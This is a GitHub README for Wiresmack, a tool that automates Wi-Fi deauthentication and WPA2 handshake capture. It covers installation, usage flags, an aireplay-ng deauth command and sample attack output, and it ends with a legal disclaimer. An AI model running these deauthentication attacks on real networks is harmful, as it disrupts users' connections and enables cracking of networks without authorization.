Skip to content

Wiremack is a tool designed for wireless network monitoring and attack automation using Airodump-ng and related utilities.

Notifications You must be signed in to change notification settings

JesseRubio/Wiresmack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Wiresmack

Wiresmack is a tool designed for wireless network monitoring and attack automation using Airodump-ng and related utilities.

Overview

Wiresmack streamlines wireless security assessments by automating data collection, deauthentication attacks, and handshake captures. It integrates multiprocessing, subprocess management, and custom scripting for efficient execution.

Developed and Tested on:

 Kali Linux (`latest`)

Installation:

sudo apt install cowpatty
git clone https://github.com/jesserubio/wiresmack.git
cd wiresmack
pip install -r requirements.txt

Docker Installation:

git clone https://github.com/jesserubio/wiresmack.git
cd wiresmack
docker build -t wiresmack .
docker run -it --rm --privileged --network=host -v "$(pwd)":/opt/wiresmack wiresmack

Usage:

Usage Examples:
  python wiresmack.py -i wlan0 -p5


Interface Arguments:
  -i       Set interface <wlan0>

Aireplay-ng Arguments:
  -p       Set number of deauthentication packets <5>

Global Arguments:
  --debug  Set logging level [DEBUG]

Run Wiresmack, select target ESSID and capture the Four-way Handshake!

╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│                                                                                                             │
|                    __      __.__                                             __                             |
|                   /  \    /  \__|______   ____   ______ _____ _____    ____ |  | __                         |
|                   \   \/\/   /  \_  __ \_/ __ \ /  ___//     \\__  \ _/ ___\|  |/ /                         |
|                    \        /|  ||  | \/\  ___/ \___ \|  Y Y  \/ __ \\  \___|    <                          |
|                     \__/\  / |__||__|    \___  >____  >__|_|  (____  /\___  >__|_ \                         |
|                          \/                  \/     \/      \/     \/     \/     \/                         │
│                                                                                                             │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Target ────────────────────────────────────────────────────────────────────────────────────────────────────╮
│                                                                                                             │
│  BSSID: BB:BB:BB:BB:BB:BB                                                                                   │
│  Channel: 7                                                                                                 │
│  Encryption: WPA2                                                                                           │
│  SSID: Contoso                                                                                              │
│  Client(s): CC:CC:CC:CC:CC:CC                                                                               │
│                                                                                                             │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Aireplay-ng ───────────────────────────────────────────────────────────────────────────────────────────────╮
│                                                                                                             │
│  aireplay-ng -0 5 -a BB:BB:BB:BB:BB:BB -c CC:CC:CC:CC:CC:CC --ignore-negative-one wlan0                     │
│                                                                                                             │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
17:00:01  Waiting for beacon frame (BSSID: BB:BB:BB:BB:BB:BB) on channel 7
17:00:02  Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 1|34 ACKs]
17:00:03  Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [17|64 ACKs]
17:00:04  Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 1|61 ACKs]
17:00:05  Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 6|128 ACKs]
17:00:06  Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 2|121 ACKs]
 [✔] Captured a Four-way Handshake!
 [✔] Four-way Handshake is most likely for: BB:BB:BB:BB:BB:BB, Contoso
 Capture file moved to: results/Contoso_April-20-2025_17:00:07.cap

 Press <ENTER> to exit

Legal Disclaimer

This project is intended for educational and security research purposes only. Unauthorized use of network monitoring tools may violate laws and regulations. The developers assume no responsibility for misuse. Always ensure you have explicit permission before testing on any network.

About

Wiremack is a tool designed for wireless network monitoring and attack automation using Airodump-ng and related utilities.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published